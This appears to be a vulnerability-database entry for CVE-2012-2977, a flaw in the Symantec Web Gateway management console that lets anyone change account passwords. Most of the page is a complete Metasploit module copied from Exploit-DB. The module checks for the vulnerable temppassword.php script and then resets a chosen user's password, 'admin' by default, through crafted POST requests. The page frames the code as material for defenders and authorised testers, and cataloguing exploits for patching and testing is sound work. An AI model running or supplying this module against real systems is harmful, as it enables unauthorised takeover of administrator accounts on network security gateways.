CVE-2012-2977

medium
Published 2012-07-23 · Modified 2026-04-29
CVSS v3
—
CVSS v4 NEW
—
not yet in upstream
VIR risk
6.0

Description

The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to change arbitrary passwords via crafted input to an application script.

Predictions

Exploit likelihood
20%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-20707 webapps linux verified
Kc57 · 2012-08-21

Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change

EDB-20706 webapps linux verified ruby · 3 KB
Kc57 · 2012-08-21

Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)

ruby exploit Source: Exploit-DB
##
# @_Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
			'Description'    => %q{
					This module will change the password for the specified account on a Symantec Web Gateway server.
			},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision: 0 $",
			'Author'         =>
				[
					'Kc57',
				],
			'References'     =>
				[
					[ 'CVE', '2012-2977' ],
					[ 'OSVDB', '0' ],
					[ 'BID', '54430' ],
					[ 'URL', 'https://www.securityfocus.com/bid/54430' ],
				],
			'DisclosureDate' => "Jul 23 2012" ))

			register_options(
				[
					Opt::RPORT(80),
					OptString.new('USER', [ true, 'The user whose password will be reset', 'admin']),
					OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
				], self.class)
	end

	def run

		print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
		res = send_request_raw(
		{
			'method'  => 'POST',
			'uri'     => '/spywall/temppassword.php',
		}, 25)

		#check to see if we get HTTP OK
		if (res.code == 200)
			print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
		else
			print_error("Did not get HTTP 200, URL was not found. Exiting!")
			return
		end

		# Check whether the temppassword.php page loads or we are redirected to the login page
		if (res.body.match(/Please Select a New Password/i))
			print_status("Server is vulnerable!")
		else
			print_error("Target doesn't seem to be vulnerable!")
			return
		end

		print_status("Attempting to exploit password change vulnerability on #{rhost}")
		print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")

		data  = 'target=executive_summary.php'
		data << '&USERNAME=' + datastore['USER']
		data << '&password=' + datastore['PASSWORD']
		data << '&password2=' + datastore['PASSWORD']
		data << '&Save=Save'

		res = send_request_cgi(
		{
			'method'  => 'POST',
			'uri'     => '/spywall/temppassword.php',
			'data'    => data,
		}, 25)

		if res.code == 200
			if (res.body.match(/Thank you/i))
				print_status("Password reset was successful!\n")
			else
				print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
			end
		else
			print_error("Password reset failed!")
		end
	end

end

Application impact

Vendor | Product | Versions | Fixed
symantec | web_gateway | 5.0 |
symantec | web_gateway | 5.0.1 |
symantec | web_gateway | 5.0.2 |
symantec | web_gateway | 5.0.3 |

References

CWEs

CWE-264
